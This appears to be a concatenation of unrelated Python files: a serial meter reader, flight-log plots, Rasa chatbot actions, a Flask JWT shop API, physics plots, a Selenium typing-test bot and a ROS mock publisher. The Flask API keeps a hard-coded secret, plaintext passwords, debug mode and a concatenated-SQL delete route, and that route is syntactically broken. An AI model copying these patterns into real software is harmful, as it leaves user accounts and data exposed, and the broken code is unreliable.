                variant[header[j]] = [word.strip().split('#') for word in row[j][1:-1].split(",")]
            # handle list columns
            if len(row[j]) > 0 and row[j][0] == "[":
                variant[header[j]] = [word.strip() for word in row[j][1:-1].split(",")]
            # handle single value columns
            else:
                variant[header[j]] = row[j]
        # pp.pprint(variant)
        # Skip samples whose ID contains '180'.
        if not '180' in variant['SAMPLE_ID']:
            counts = make_gff(variant, i, counts)
    i += 1
# Aggregate the per-phenotype tallies into totals per CNV class.
count_summary = OrderedDict()
count_summary['VALID'] = 0
for phenotype, type_dict in counts.iteritems():
    for name, val in type_dict.iteritems():
        if not name in count_summary:
            count_summary[name] = 0
        count_summary[name] += counts[phenotype][name]
        if name in ['CNV', 'CTL']:
            count_summary['VALID'] += counts[phenotype][name]
# Write both count tables as JSON next to the source label.
f = open("%s_cnv_stats.txt" % args.source.split(".")[0], 'w')
print >> f, json.dumps(counts, indent=4)
print >> f, json.dumps(count_summary, indent=4)
f.close()
actual_all = {}
|
class MonthTime:
    """A (year, month) pair ordered chronologically.

    Construct from explicit year/month, or from a "Y/M/..." string.
    """

    def __init__(self, year=None, month=None, time_str=None):
        self.year = year
        self.month = month
        if time_str is not None:
            y, m, _ = time_str.split('/')
            self.year = int(y)
            self.month = int(m)

    def _key(self):
        # Tuple comparison reproduces the hand-written year-then-month order.
        return (self.year, self.month)

    def __lt__(self, other):
        return self._key() < other._key()

    def __eq__(self, other):
        return self._key() == other._key()

    def __gt__(self, other):
        return self._key() > other._key()

    def __ge__(self, other):
        return self > other or self == other

    def __le__(self, other):
        return self < other or self == other
class DateTime:
    """A (year, month, day) date ordered chronologically.

    Construct from explicit fields, or from a "Y/M/D" string.
    """

    def __init__(self, year=None, month=None, day=None, time_str=None):
        self.year = year
        self.month = month
        self.day = day
        if time_str is not None:
            y, m, d = time_str.split('/')
            self.year = int(y)
            self.month = int(m)
            self.day = int(d)

    def _key(self):
        # Tuple comparison reproduces the cascaded year/month/day checks.
        return (self.year, self.month, self.day)

    def __lt__(self, other):
        return self._key() < other._key()

    def __eq__(self, other):
        return self._key() == other._key()

    def __gt__(self, other):
        return self._key() > other._key()

    def __ge__(self, other):
        return self > other or self == other

    def __le__(self, other):
        return self < other or self == other

    def __set__(self, instance, value):
        # Mirrors the original: builds a TimeSect (defined later in this
        # file) when used as a descriptor.
        if isinstance(instance, TimeSect):
            return TimeSect(value)
        if isinstance(instance, str):
            return TimeSect(value)

    def __str__(self):
        return "%d/%d/%d" % (self.year, self.month, self.day)
class TimeSect:
    """A full date-time (Y/M/D H:M:S) with chronological ordering.

    Built from a "Y/M/D H:M:S" string, by copying another TimeSect, or
    empty (all fields None).
    """

    def __init__(self, time_str=None, time_sect=None):
        if time_str:
            date_part, time_part = time_str.split()
            self.year, self.month, self.day = [int(k) for k in date_part.split("/")]
            self.hour, self.minute, self.second = [int(k) for k in time_part.split(":")]
        elif time_sect:
            self.year = time_sect.year
            self.month = time_sect.month
            self.day = time_sect.day
            # Bug fix: the original assigned time_sect.hour to self.year
            # (clobbering the year and leaving self.hour unset) and read
            # the misspelled attribute `mintue` (AttributeError).
            self.hour = time_sect.hour
            self.minute = time_sect.minute
            self.second = time_sect.second
        else:
            self.year, self.month, self.day = None, None, None
            self.hour, self.minute, self.second = None, None, None

    def _key(self):
        # Tuple comparison is equivalent to the original cascaded checks.
        return (self.year, self.month, self.day, self.hour, self.minute, self.second)

    def __lt__(self, other):
        return self._key() < other._key()

    def __eq__(self, other):
        return self._key() == other._key()

    def __gt__(self, other):
        return self._key() > other._key()

    def __ge__(self, other):
        return self > other or self == other

    def __le__(self, other):
        return self < other or self == other

    def __set__(self, instance, value):
        # Kept from the original: builds a fresh TimeSect when used as a
        # descriptor.
        if isinstance(instance, TimeSect):
            return TimeSect(value)
        if isinstance(instance, str):
            return TimeSect(value)

    def __str__(self):
        return "%d-%d-%d\t%d:%d:%d" % (self.year, self.month, self.day,
                                       self.hour, self.minute, self.second)
|
#!/usr/local/bin/python
from __future__ import print_function
import serial
class dlmsError(Exception):
    """Raised on DLMS transport or protocol failures."""

    def __init__(self, reason):
        # Keep the failure reason accessible to callers.
        self.reason = reason

    def __str__(self):
        return repr(self.reason)
class dlms(object):
    """Read one dataset from an IEC 62056-21 ("DLMS") meter over serial.

    Protocol mode A: sign-on at 300 baud 7E1, then parse the ASCII reply
    (ident line, STX, body, '!', ETX, XOR checksum).
    NOTE(review): written for Python 2 -- on Python 3 `self.ser.write`
    needs bytes and `id += a` mixes str with bytes; confirm the runtime.
    """
    def __init__(self, serial_port = "/dev/cuaU3"):
        # 300 baud, 7 data bits, even parity: the standard sign-on settings.
        self.ser = serial.Serial(
            port = serial_port,
            baudrate = 300,
            bytesize = serial.SEVENBITS,
            parity = serial.PARITY_EVEN,
            timeout = 3.0)
    def query(self):
        """Send the "/?!" request and return parse()'s [ident, {code: values}]."""
        self.ser.write("/?!\r\n")
        state = 0   # receive state-machine position
        id = ""     # ident line (NOTE: shadows the builtin `id`)
        cont = ""   # message body
        sum = 0     # XOR checksum accumulator (NOTE: shadows builtin `sum`)
        while True:
            a = self.ser.read(1)
            if len(a) == 0:
                raise dlmsError("Rx Timeout")
            b = bytearray(a)[0] #Reads the ascii code of the first character
            if state == 0:
                # Read ID string
                if b >= 32: #32 is a space
                    id += a
                elif b == 13: #is carrige return
                    state = 1
                else:
                    raise dlmsError(
                        "Illegal char in ident 0x%02x" % b)
                    # NOTE(review): dead code -- the raise above exits first.
                    state = 99
            elif state == 1:
                # NL ending ID string
                if b != 10: #10 is new line
                    raise dlmsError(
                        "Ident has 0x%02x after CR" % b)
                    # NOTE(review): dead code after raise.
                    state = 99
                else:
                    state = 2
            elif state == 2:
                # STX
                if b != 2: #start of text
                    raise dlmsError(
                        "Expected STX not 0x%02x" % b)
                    # NOTE(review): dead code after raise.
                    state = 99
                else:
                    state = 3
            elif state == 3:
                # message body; ETX (0x03) terminates it
                sum ^= b
                if b != 3:
                    cont += a
                else:
                    state = 4
            elif state == 4:
                # Checksum
                if sum != b:
                    raise dlmsError(
                        "Checksum Mismatch")
                    # NOTE(review): dead code after raise, and `==` is a
                    # comparison, not the intended assignment.
                    state == 99
                else:
                    return self.parse(id, cont)
            elif state == 99:
                # Error, flush
                pass
        # Unreachable: the loop only exits via return or raise.
        assert False
    def parse(self, id, cont):
        """Split the body into "code(value[*unit])" items.

        Returns [ident, dict] mapping each data-item code to its
        ["value"] or ["value", "unit"] list.
        """
        l = list()
        l.append(id)
        l.append(dict())
        cont = cont.split("\r\n")
        if cont[-1] != "":
            raise dlmsError(
                "Last data item lacks CRNL")
        if cont[-2] != "!":
            raise dlmsError(
                "Last data item not '!'")
        for i in cont[:-2]:
            if i[-1] != ")":
                raise dlmsError(
                    "Last char of data item not ')'")
                # NOTE(review): dead code after raise.
                return None
            i = i[:-1].split("(")
            j = i[1].split("*")
            l[1][i[0]] = j
        return l
# Manual smoke test: query the meter on the default port and pretty-print
# every returned data item (value plus optional unit).
if __name__ == "__main__":
    foo = dlms()
    a = foo.query()
    print("%16s: %s" % ("identifier", a[0]))
    print("")
    for i in a[1]:
        j = a[1][i]
        if len(j) == 2:
            print("%16s: %s [%s]" % (i, j[0], j[1]))
        else:
            print("%16s: %s" % (i, j[0]))
|
# %% Some preparations
import shutil as sh
import os
from datetime import date
from pprint import pprint
import numpy as np
import plot_helper as ph
import mav_log_helper as mlh
Ts = 0.04  # Most probably
# Locate today's newest flight-log directory under the water-tank test root.
base_dir = "/home/slovak/fishbot/test/water_tank/"
test_day_dir = "fishbot/logs/" + date.today().strftime("%Y-%m-%d")
latest_flight = sorted(os.listdir(base_dir + test_day_dir))[-1]
log_dir = test_day_dir + "/" + latest_flight + "/"
# Or set explicitly
# log_dir = "fishbot/logs/2019-07-04/flight4/"
log_dir = base_dir + log_dir
print(log_dir)
# Convert/load the raw logs via the project helper module.
data_json = mlh.dir_prepare(log_dir)
data_raw = mlh.dir_load(log_dir)
# Ship plotly alongside the generated HTML so the plots work offline.
if not os.path.isfile(log_dir + "plotly-latest.min.js"):
    sh.copy("plotly-latest.min.js", log_dir)
# %% ATTITUDE
plt = ph.WebPlot(log_dir + "attitude.html")
# Dataflash logs: ATT message, scaled by pi/180.
for k, v in data_raw.items():
    if "ATT" not in v.keys():
        continue
    fig = ph.make_subplots(k, rows=1, cols=1)
    print(k)
    print(v.keys())
    fig.append_trace(ph.get_ts_scatter(v, "ATT", "Roll", scaler=np.pi / 180), 1, 1)
    fig.append_trace(ph.get_ts_scatter(v, "ATT", "Pitch", scaler=np.pi / 180), 1, 1)
    fig.append_trace(ph.get_ts_scatter(v, "ATT", "Yaw", scaler=np.pi / 180), 1, 1)
    #
    # fig.append_trace(wp.get_ts_scatter(v, "IMU", "AccX"), 2, 1)
    # fig.append_trace(wp.get_ts_scatter(v, "IMU", "AccY"), 2, 1)
    # fig.append_trace(wp.get_ts_scatter(v, "IMU", "AccZ"), 2, 1)
    #
    # fig.append_trace(wp.get_ts_scatter(v, "IMU", "GyrX"), 3, 1)
    # fig.append_trace(wp.get_ts_scatter(v, "IMU", "GyrY"), 3, 1)
    # fig.append_trace(wp.get_ts_scatter(v, "IMU", "GyrZ"), 3, 1)
    plt.plot(fig)
# MAVLink telemetry logs: ATTITUDE message.
for k, v in data_raw.items():
    if 'ATTITUDE' not in v.keys():
        continue
    fig = ph.make_subplots(k, rows=1, cols=1)
    fig.append_trace(ph.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.roll"), 1, 1)
    fig.append_trace(ph.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.pitch"), 1, 1)
    fig.append_trace(ph.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.yaw"), 1, 1)
    #
    # fig.append_trace(wp.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.rollspeed"), 2, 1)
    # fig.append_trace(wp.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.pitchspeed"), 2, 1)
    # fig.append_trace(wp.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.yawspeed"), 2, 1)
    plt.plot(fig)
plt.show()
# NOTE(review): everything below this exit() never runs as written.
exit(0)
# %% RC ins and outs
plt = ph.WebPlot(log_dir + "rc_in_out.html")
for k, v in data_raw.items():
    if "RCIN" not in v.keys():
        continue
    fig = ph.make_subplots(k, rows=6, cols=1)
    # Channels 1..6: input vs. output per subplot row.
    for idx in range(1, 7):
        fig.append_trace(ph.get_ts_scatter(v, "RCIN", "C" + str(idx)), idx, 1)
        fig.append_trace(ph.get_ts_scatter(v, "RCOU", "C" + str(idx)), idx, 1)
    plt.plot(fig)
plt.show()
# %% Stats for messages
def get_stats(msg_value):
    """Median sample rate (Hz, rounded) of a message's timestamp trace.

    Returns a one-element list, or '' when there are too few timestamps.
    """
    if "timestamp" not in msg_value or len(msg_value["timestamp"]) <= 2:
        return ''
    intervals = np.diff(msg_value["timestamp"])
    return [
        round(1 / np.median(intervals)),
        # round(1/np.min(...)) and round(1/np.max(...)) were disabled in
        # the original as well.
    ]
# %% All
# Per-source, per-message sample-rate summary for every trace.
# NOTE(review): get_stats(msg_value) ignores trace_value, so every trace of
# a message reports the same rate -- possibly intended; confirm.
msg_struct = [{msg_name: {trace_name: get_stats(msg_value) for trace_name, trace_value in msg_value.items()} for msg_name, msg_value in
               data_raw[key].items()} for key in data_raw.keys()]
pprint(msg_struct)
# %% Dataflash
msg_struct = [{msg_name: {trace_name: get_stats(msg_value) for trace_name, trace_value in msg_value.items()} for msg_name, msg_value in
               data_raw[key].items()} for key in ["1"]]
pprint(msg_struct)
# %% Mavlink
msg_struct = [{msg_name: {trace_name: get_stats(msg_value) for trace_name, trace_value in msg_value.items()} for msg_name, msg_value in
               data_raw[key].items()} for key in ["flight"]]
pprint(msg_struct)
# %% Something more
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from rasa_core.actions.action import Action
from rasa_core.events import SlotSet
import sqlite3
class ActionSearchFaculty(Action):
    """Custom Rasa action: look up a faculty member's description by name."""

    def name(self):
        return 'action_search_faculty'

    def run(self, dispatcher, tracker, domain):
        db = sqlite3.connect("sqlite.db")
        cursor = db.cursor()
        name = tracker.get_slot('faculty_name')
        # Parameterized LIKE: the slot text is untrusted user input -- the
        # original concatenated it into the SQL string (injection risk).
        query = "SELECT about FROM faculty WHERE name LIKE ?"
        cursor.execute(query, ('%' + name + '%',))
        results = [list(row) for row in cursor]
        if not results:
            db.close()  # the original leaked the connection on this path
            #description=glasearch(name)
            #we are not calling glasearch() function because we cannot make our key public
            dispatcher.utter_message("sorry no data found")
            return [SlotSet("faculty_name", None)]
        db.close()
        dispatcher.utter_message("here are the details of faculty you asked for")
        description = name
        dispatcher.utter_message("{}".format(results))
        return [SlotSet("faculty_name", description)]
class ActionSearchState(Action):
    """Custom Rasa action: list office centres located in a given state."""

    def name(self):
        return 'action_search_state'

    def run(self, dispatcher, tracker, domain):
        db = sqlite3.connect("sqlite.db")
        cursor = db.cursor()
        name = tracker.get_slot("States")
        try:
            # Parameterized LIKE: the slot text is untrusted user input --
            # the original concatenated it into the SQL string (injection).
            query = "SELECT city,address FROM officedata WHERE state LIKE ?"
            cursor.execute(query, ('%' + name + '%',))
        except Exception:
            # Narrowed from the original bare `except:` so Ctrl-C and
            # SystemExit are not swallowed; keeps the best-effort reply.
            dispatcher.utter_message("An error occurred.")
        centres = [list(row) for row in cursor]
        if not centres:
            db.close()  # the original leaked the connection on this path
            description = "sorry no office in that state found"
            dispatcher.utter_message("{}".format(description))
            return [SlotSet("States", None)]
        db.close()
        dispatcher.utter_message("here are the centres present in this state")
        description = centres
        dispatcher.utter_message("{}".format(description))
        return [SlotSet("States", name)]
class ActionAddName(Action):
    """Custom Rasa action: write the current `student_name` slot back unchanged."""

    def name(self):
        return 'action_add_name'

    def run(self, dispatcher, tracker, domain):
        current_name = tracker.get_slot('student_name')
        return [SlotSet("student_name", current_name)]
class ActionAddDegree(Action):
    """Custom Rasa action: write the current `degree` slot back unchanged."""

    def name(self):
        return 'action_add_degree'

    def run(self, dispatcher, tracker, domain):
        current_degree = tracker.get_slot('degree')
        return [SlotSet("degree", current_degree)]
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 14 09:18:05 2019
@author: jose
"""
def squareRootExhaustive(x, epsilon):
    """Exhaustively search for an approximate square root of x.

    Assumes x and epsilon are positive floats & epsilon < 1.
    Returns y such that y*y is within epsilon of x.
    Raises ValueError if no multiple of epsilon**2 lands within epsilon of x.
    """
    step = epsilon ** 2
    ans = 0.0
    # March upward in fixed increments; stop once ans*ans is within epsilon
    # of x, or once we have overshot x (search exhausted). The debug print
    # that ran on every iteration has been removed.
    while abs(ans * ans - x) >= epsilon and ans * ans <= x:
        ans += step
    # Fixed: the original raised whenever ans*ans > x, which rejected valid
    # answers that overshoot x but still land within epsilon.
    if abs(ans * ans - x) >= epsilon:
        raise ValueError("step size %g never came within %g of a root of %g"
                         % (step, epsilon, x))
    return ans

print(squareRootExhaustive(4, 0.2))
import hmac
import sqlite3
import datetime
from flask_cors import CORS
from flask import Flask, request, jsonify
from flask_jwt import JWT, jwt_required, current_identity
class User(object):
    """Minimal account record consumed by the Flask-JWT callbacks.

    Attributes mirror the user table row: id, username, password.
    """

    def __init__(self, id, username, password):
        # `id` shadows the builtin, but the parameter name is part of the
        # constructor's keyword interface, so it is kept as-is.
        self.id = id
        self.username = username
        self.password = password
def init_user_table():
    """Create the `user` table in online.db if it does not already exist."""
    ddl = ("CREATE TABLE IF NOT EXISTS user"
           "(user_id INTEGER PRIMARY KEY AUTOINCREMENT,"
           "first_name TEXT NOT NULL,"
           "last_name TEXT NOT NULL,"
           "username TEXT NOT NULL,"
           "password TEXT NOT NULL)")
    connection = sqlite3.connect('online.db')
    print("Opened database successfully")
    connection.execute(ddl)
    print("user table created successfully")
    connection.close()
def fetch_users():
    """Load every row of the user table and wrap each as a User.

    Row layout: index 0 is user_id, 3 is username, 4 is password.
    """
    with sqlite3.connect('online.db') as conn:
        rows = conn.cursor().execute("SELECT * FROM user").fetchall()
    return [User(row[0], row[3], row[4]) for row in rows]
def init_products_table():
    """Create the `post` products table in online.db if it does not exist."""
    ddl = ("CREATE TABLE IF NOT EXISTS post (id INTEGER PRIMARY KEY AUTOINCREMENT,"
           "name TEXT NOT NULL,"
           "products TEXT NOT NULL,"
           "price_of_product TEXT NOT NULL, "
           "product_description TEXT NOT NULL)")
    with sqlite3.connect('online.db') as conn:
        conn.execute(ddl)
        print("products table created successfully.")
# Ensure both tables exist before the app starts serving requests.
init_user_table()
init_products_table()
# Snapshot of registered users, indexed for the Flask-JWT callbacks.
# NOTE(review): built once at import time — users registered after startup
# are not visible to authenticate()/identity() until the process restarts.
users = fetch_users()
username_table = {u.username: u for u in users}
userid_table = {u.id: u for u in users}
def authenticate(username, password):
    """Flask-JWT auth callback: return the matching User, or None.

    NOTE(review): passwords are stored and compared in plaintext;
    compare_digest only guards against timing attacks, not disclosure.
    """
    candidate = username_table.get(username, None)
    if candidate is None:
        return None
    if hmac.compare_digest(candidate.password.encode('utf-8'),
                           password.encode('utf-8')):
        return candidate
def identity(payload):
    """Flask-JWT identity callback: map a decoded token payload to its User."""
    return userid_table.get(payload['identity'], None)
app = Flask(__name__)
app.debug = True  # NOTE(review): debug mode must be disabled in production
# NOTE(review): hard-coded JWT signing secret — load from configuration
# or the environment instead of source.
app.config['SECRET_KEY'] = 'super-secret'
# Flask-JWT wires POST /auth to authenticate() and token decoding to identity().
jwt = JWT(app, authenticate, identity)
@app.route('/protected')
@jwt_required()
def protected():
    """JWT-guarded sanity endpoint: returns the authenticated user's repr."""
    return '%s' % current_identity
@app.route('/user-registration/', methods=["POST"])
def user_registration():
    """Register a new user from posted form fields.

    Expects form fields first_name, last_name, username, password.
    Returns {"message": "success", "status_code": 201} on success.
    NOTE(review): the password is stored in plaintext.
    """
    response = {}
    if request.method == "POST":
        form = request.form
        record = (form['first_name'], form['last_name'],
                  form['username'], form['password'])
        with sqlite3.connect("online.db") as conn:
            conn.cursor().execute("INSERT INTO user("
                                  "first_name,"
                                  "last_name,"
                                  "username,"
                                  "password) VALUES(?, ?, ?, ?)", record)
            conn.commit()
        response["message"] = "success"
        response["status_code"] = 201
    return response
@app.route('/create-products/', methods=["POST"])
@jwt_required()
def create_products():
    """Create a product row from form fields name, price, product_description.

    Returns {"status_code": 201, "description": ...} on success.
    """
    response = {}
    if request.method == "POST":
        name = request.form['name']
        price = request.form['price']
        product_description = request.form['product_description']
        with sqlite3.connect('online.db') as conn:
            cursor = conn.cursor()
            # Fixed: the original INSERT named columns the post table does
            # not have (price, date_created), was missing a comma so
            # "product_description" and "date_created" fused into one token,
            # and supplied 4 parameters for 3 placeholders — every request
            # raised a sqlite3 error. Columns now match the schema created
            # by init_products_table.
            # NOTE(review): the schema declares a NOT NULL 'products' column
            # this form never supplies; the product name is reused for it
            # here — confirm the intended meaning of that column.
            cursor.execute("INSERT INTO post("
                           "name,"
                           "products,"
                           "price_of_product,"
                           "product_description) VALUES(?, ?, ?, ?)",
                           (name, name, price, product_description))
            conn.commit()
        response["status_code"] = 201
        response['description'] = "products added successfully"
    return response
@app.route('/get-products', methods=["GET"])
def get_products():
    """Return every product row as JSON.

    Fixed: the original selected from a nonexistent 'products' table; the
    schema created by init_products_table names the table 'post'.
    """
    response = {}
    with sqlite3.connect("online.db") as conn:
        cursor = conn.cursor()
        cursor.execute("SELECT * FROM post")
        products = cursor.fetchall()
    response['status_code'] = 200
    response['data'] = products
    return response
@app.route("/delete-products/<int:post_id>")
@jwt_required()
def delete_products(products_id):
response = {}
with sqlite3.connect("online.db") as conn:
cursor = conn.cursor()
cursor.execute("DELETE FROM products WHERE id=" + str(products_id))
conn.commit()
response['status_code'] = 200
response['message'] = "product deleted successfully."
return response
@app.route('/edit-products/<int:products_id>/', methods=["PUT"])
@jwt_required()
def edit_post(products_id):
    """Update a product's name from a JSON PUT body.

    Fixed: the original contained two identical copies of the "name" update
    branch, and the first one targeted a nonexistent 'products' table —
    every request failed there before reaching the working copy. A single
    update against the real 'post' table remains.
    """
    response = {}
    if request.method == "PUT":
        incoming_data = dict(request.json)
        new_name = incoming_data.get("name")
        if new_name is not None:
            with sqlite3.connect('online.db') as conn:
                cursor = conn.cursor()
                cursor.execute("UPDATE post SET name =? WHERE id=?",
                               (new_name, products_id))
                conn.commit()
            response['message'] = "Update was successful"
            response['status_code'] = 200
    return response
@app.route('/get-products/<int:products_id>/', methods=["GET"])
def get_single_product(products_id):
    """Return one product row by id as JSON.

    Fixed: this view was also named get_products, colliding with the list
    endpoint above — Flask refuses to register two view functions under the
    same endpoint name, so the module failed at import. Also switched to the
    real 'post' table and a bound parameter instead of string concatenation.
    """
    response = {}
    with sqlite3.connect("online.db") as conn:
        cursor = conn.cursor()
        cursor.execute("SELECT * FROM post WHERE id=?", (products_id,))
        response["status_code"] = 200
        response["description"] = "products retrieved successfully"
        response["data"] = cursor.fetchone()
    return jsonify(response)
|
#!/usr/bin/python
import sys
import re
import os
import numpy as np
from scipy import optimize
import math
from bs4 import BeautifulSoup
import requests
from tabulate import tabulate
import matplotlib.pyplot as plt
from matplotlib import animation
from matplotlib.ticker import AutoMinorLocator, MultipleLocator, LogLocator
from root_numpy import tree2rec
import argparse
# Setup command line option parser to capture the arguments.
# Beam and target are both required, formatted ELEMENT_MASSNUM_ATOMICNUM
# (e.g. Li_6_3).
parser = argparse.ArgumentParser(description='Command arguments for sfresco running and plot creation')
parser.add_argument('-b','--beam', help='Beam (ELEMENT_MASSNUM_ATOMICNUM). Must be separated by underscores. ',required=True)
parser.add_argument('-t','--target',help='Target (ELEMENT_MASSNUM_ATOMICNUM). Must be separated by underscores.', required=True)
# Render all plot text with LaTeX in a serif font.
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# Table of target masses (amu). NOTE(review): the original comments labeled
# these two tables the wrong way around (this one said "beam masses").
targetMasses = {
    'C_12_6' : 11.9999999999999,
    'Si_28_14' : 27.97692653246,
    'Ca_40_20' : 39.962590983,
    'Ni_58_28' : 57.935342907
}
# Table of beam masses (amu).
beamMasses = {
    'Li_6_3' : 6.015122794,
    'Li_7_3' : 7.016004548,
    'Be_7_4' : 7.016929828
}
args = parser.parse_args()
args_dict = vars(parser.parse_args())
# Split the NAME_MASSNUM_Z strings into their components.
target_str_unsplit = args.target
target_str = target_str_unsplit.split('_')
beam_str_unsplit = args.beam
beam_str = beam_str_unsplit.split('_')
# Index 2 is the atomic number Z.
# NOTE(review): beamZ/targetZ are later passed to getPotential's Ap/At
# (mass-number) parameters — confirm whether Z or A is intended there.
beamZ = float(beam_str[2])
targetZ = float(target_str[2])
# LaTeX label for the (elastic) reaction, built from the parsed fragments.
reaction = "${}^{%s}\!%s({}^{%s}\!%s,{}^{%s}\!%s){}^{%s}\!%s$" % ( target_str[1], target_str[0], beam_str[1], beam_str[0], beam_str[1], beam_str[0], target_str[1], target_str[0])
b = beam_str[0]+beam_str[1]
t = target_str[0]+target_str[1]
def getPotential(W, a, ri, Ap, At, r):
    """Woods-Saxon potential evaluated at radius r.

    W  -- potential depth (MeV)
    a  -- diffuseness (fm)
    ri -- reduced radius parameter (fm)
    Ap, At -- projectile and target mass numbers (radius scales with their
              cube roots)
    r  -- radial distance (fm)

    Returns -W / (1 + exp((r - R)/a)) with R = ri * (Ap^(1/3) + At^(1/3)).
    """
    # Replaced the C-style "(float)(1/3)" casts and pow(..., -1) with plain
    # Python arithmetic; numerically equivalent under Python 3 division.
    R = ri * (Ap ** (1.0 / 3.0) + At ** (1.0 / 3.0))
    return -W / (1.0 + np.exp((r - R) / a))
# --- Imaginary part of the optical potential at several beam energies ---
imFig = plt.figure()
imAx = plt.axes(ylim=(-10,1) )
# Radial grid, 0-10 fm.
x = np.linspace(0,10,100)
# One curve per beam energy: getPotential(W, a, r_i, ...) with fitted
# depth / diffuseness / radius parameters for that energy.
y24 = [getPotential(5.046, 0.686, 1.429, beamZ, targetZ, aR) for aR in x]
y30 = [getPotential(7.492, 0.690, 1.300, beamZ, targetZ, aR) for aR in x]
y123p5 = [getPotential(8.922, 0.853, 1.294, beamZ, targetZ, aR) for aR in x]
y169 = [getPotential(14.55,0.712,1.102, beamZ, targetZ, aR) for aR in x]
y210 = [getPotential(16.53,0.878,1.041, beamZ, targetZ, aR) for aR in x]
y350 = [getPotential(24.29, 2.0, 0.970, beamZ, targetZ, aR) for aR in x]
# Nadasen global-fit parameter sets (currently not plotted, see below).
yNasden318 = [getPotential(29.3, 0.878, 1.695, beamZ, targetZ, aR) for aR in x]
yNasden210 = [getPotential(34.2, 0.784, 1.682, beamZ, targetZ, aR) for aR in x]
plt.ylabel( '$U(r)_{\text{imag}} [MeV]$' )
plt.xlabel( '$r [fm]$' )
plt.title( 'Imaginary Potential' )
imAx.plot( x, y24, lw=2, linestyle='-', label="24 MeV" , color = "green")
imAx.plot( x, y30, lw=2, linestyle='-', label="30 MeV" , color = "blue")
imAx.plot( x, y123p5, lw=2, linestyle='-', label="123.5 MeV", color = "red" )
imAx.plot( x, y169, lw=2, linestyle='-', label="169 MeV", color = "black" )
imAx.plot( x, y210, lw=2, linestyle='-', label="210 MeV", color = "yellow" )
imAx.plot( x, y350, lw=2, linestyle='-', label="350 MeV", color = "orange" )
#imAx.plot( x, yNasden210, lw=2, linestyle='--', label="Nadasen 210", color="yellow", alpha=0.9 )
#imAx.plot( x, yNasden318, lw=2, linestyle='--', label="Nadasen 318", color="pink", alpha=0.9 )
plt.grid( True )
plt.legend(loc="best")
plt.savefig("Imaginary.pdf")
# --- Real part of the optical potential ---
# NOTE(review): no plt.figure() call before this plt.axes(), so these axes
# are added to the current (imaginary-potential) figure — confirm Real.pdf
# renders as intended.
reAx = plt.axes(ylim=(-140,10))
yRe = [getPotential(180.0, 0.853, 0.529, beamZ, targetZ, aR) for aR in x]
yNadasen210Re = [getPotential(113.5, 0.793, 1.305, beamZ, targetZ, aR) for aR in x]
yNadasen318Re = [getPotential(126.9, 0.897, 1.136, beamZ, targetZ, aR) for aR in x]
plt.ylabel( '$U(r)_{\text{real}} [MeV]$' )
plt.xlabel( '$r [fm]$' )
plt.title( 'Real Potential' )
reAx.plot( x, yRe, lw=2, linestyle='-', label="OM Empirical", color="black")
reAx.plot( x, yNadasen210Re, lw=2, linestyle='--', label="Nadasen 210", color="red")
reAx.plot( x, yNadasen318Re, lw=2, linestyle='--', label="Nadasen 318", color="blue")
plt.grid( True )
plt.legend(loc="lower right")
plt.savefig("Real.pdf")
#plt.show()
|
# Importing required modules
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
import time
# Opening website
# Open the typing-test page in a fresh Chrome session.
chrome = webdriver.Chrome()
chrome.get('https://www.livechatinc.com/typing-speed-test/#/')
# Wait while website opens
chrome.implicitly_wait(5)
# Set timeout time for while loop. 60 seconds.
timeout = time.time() + 60
# Grab current word to type and then enter it. Stop after 60 seconds.
while True:
    if time.time() > timeout:
        break
    else:
        # Scrape the current word straight out of the raw page source:
        # accumulate characters after the data-reactid marker (offset +43
        # skips the marker itself) until the next '<' tag delimiter.
        # NOTE(review): brittle — depends on React's exact markup and id;
        # breaks if the live page changes.
        string = ''
        counter = 0
        while '<' not in string:
            string += chrome.page_source[chrome.page_source.index('data-reactid=".0.2.0.0.$=12.0.$=10.1.0.$0"')+43+counter]
            counter += 1
        # Turn the trailing '<' into a space so the word gets submitted.
        string = string.replace('<',' ')
        action = ActionChains(chrome)
        action.send_keys(string)
        action.perform()
#! /usr/bin/env python
import rospy
import random
from math import sqrt
from threading import Thread
from functools import reduce
from centralized_dashboard.msg import NavigationMsg
from centralized_dashboard.msg import Drive
stop_flag = False
class NavData:
    """Publishes mock GPS navigation data and simulates driving to a target."""

    def __init__(self, topic_name='/nav_data', frequency=100):
        self.publisher = rospy.Publisher(topic_name, NavigationMsg, queue_size=1)
        self.subscriber = rospy.Subscriber('/set_nav_data', NavigationMsg, self.set_target)
        self.rate = rospy.Rate(frequency)
        # Start at — and initially target — a fixed point near Madison, WI.
        self.cur_lat = 43.01
        self.cur_long = -89.01
        self.tar_lat = 43.01
        self.tar_long = -89.01

    def set_target(self, data):
        """Subscriber callback: record a new navigation target."""
        self.tar_lat = data.tar_lat
        self.tar_long = data.tar_long

    def get_target_coordinates(self):
        """Return the target position as a {'lat', 'long'} dict."""
        return {'lat': self.tar_lat, 'long': self.tar_long}

    def get_current_coordinates(self):
        """Return the current position as a {'lat', 'long'} dict."""
        # Sample is Bascom Hall
        return {'lat': self.cur_lat, 'long': self.cur_long}

    def get_heading(self):
        """Return a random heading in degrees.

        TODO: get this in a more dynamic way that yet makes sense
        """
        return random.randrange(0, 360)

    def move_forward(self):
        """Advance the mock rover one step toward the target.

        No-op when the global stop flag is set or the target is reached.
        """
        global stop_flag
        if stop_flag:
            return
        line_speed = 0.0001
        d_lat = self.tar_lat - self.cur_lat
        d_long = self.tar_long - self.cur_long
        dist = sqrt(d_lat * d_lat + d_long * d_long)
        if dist != 0:
            # Move line_speed units along the unit vector toward the target.
            self.cur_lat += d_lat / dist * line_speed
            self.cur_long += d_long / dist * line_speed

    def talker(self):
        """Publish fake NavigationMsg data at the configured rate until shutdown."""
        msg = NavigationMsg()
        while not rospy.is_shutdown():
            target = self.get_target_coordinates()
            msg.tar_lat = target['lat']
            msg.tar_long = target['long']
            current = self.get_current_coordinates()
            msg.cur_lat = current['lat']
            msg.cur_long = current['long']
            msg.heading = self.get_heading()
            self.publisher.publish(msg)
            self.move_forward()  # simulate driving toward the target
            self.rate.sleep()
class DriveData:
    """Publishes mock wheel-speed data; latches the global stop flag when
    every wheel is commanded to zero."""

    def __init__(self, topic_name='/drive_data', frequency=100):
